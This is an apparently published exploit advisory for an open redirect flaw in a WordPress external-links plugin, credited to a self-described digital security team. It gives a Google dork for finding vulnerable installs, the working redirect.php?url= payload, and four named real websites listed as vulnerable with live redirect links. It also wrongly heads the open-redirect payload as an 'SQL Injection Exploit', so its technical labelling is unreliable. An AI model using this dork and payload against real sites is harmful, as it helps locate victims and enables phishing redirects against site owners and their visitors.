####################################################################
# Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/02/2019
# Vendor Homepage : finewebdev.com
# Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip
downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip
# Software Information Link : wordpress.org/plugins/wp-external-links/
# Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info/''
# Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : packetstormsecurity.com/files/151679/WordPress-WP-JS-External-Link-Info-2.2.0-Open-Redirection.html
####################################################################
# Description about Software :
***************************
“WP External Links (nofollow new tab seo)” is open source software.
Manage external and internal links on your site.
####################################################################
# Impact :
***********
WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability
because the application fails to properly verify user-supplied input.
Exploiting this issue may allow attackers to redirect users to arbitrary web sites
and conduct phishing attacks; other attacks are also possible.
WordPress Plugin WP Js External Link Info version 1.21 - 1.81 and 2.2.0 is
vulnerable; prior versions may also be affected.
####################################################################
# SQL Injection Exploit :
**********************
/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov
####################################################################
# Example Vulnerable Sites :
*************************
[+] new.0points.com/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://cxsecurity.com
[+] foerderverein-bergbad.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://packetstormsecurity.com
[+] wataaah.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://www.cyberizm.org/
[+] blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://exploit4arab.org
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################